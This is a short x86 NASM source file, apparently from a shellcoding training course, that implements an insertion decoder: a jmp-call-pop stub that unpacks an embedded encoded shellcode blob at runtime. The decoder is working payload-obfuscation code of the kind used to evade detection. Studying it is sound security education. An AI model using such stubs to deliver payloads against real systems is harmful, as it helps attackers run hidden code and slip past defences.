; Filename: insertion-decoder.nasm
; Author:  Vivek Ramachandran
; Website:  http://securitytube.net
; Training: http://securitytube-training.com 
;
;
; Purpose: 

global _start			
section .text

_start:
	jmp short call_shellcode

decoder:
	pop esi
	lea edi, [esi +1]
	xor eax, eax
	mov al, 1
	xor ebx, ebx

decode: 
	mov bl, byte [esi + eax]
	xor bl, 0x0a ; marker1
	jz short EncodedShellcode
	mov bl,byte [esi+eax+1]
	
	add bl, 1
	;ror bl, 1

	mov byte [edi],bl
	inc edi
	add al, 2
	jmp short decode	

call_shellcode:
	call decoder
	EncodedShellcode: db 0x30,0xa0,0xbf,0x15,0x4f,0xcb,0x67,0x24,0x2e,0x55,0x2e,0xe1,0x72,0xa1,0x67,0x84,0x67,0x1b,0x2e,0x13,0x61,0xc6,0x68,0xce,0x6d,0x26,0x88,0xa9,0xe2,0xda,0x4f,0x0e,0x88,0xb9,0xe1,0x93,0x52,0xac,0x88,0xfa,0xe0,0x29,0xaf,0x8c,0x0a,0xb0,0xcc,0xd2,0x7f,0x3e,0x0a,0x0a ; marker2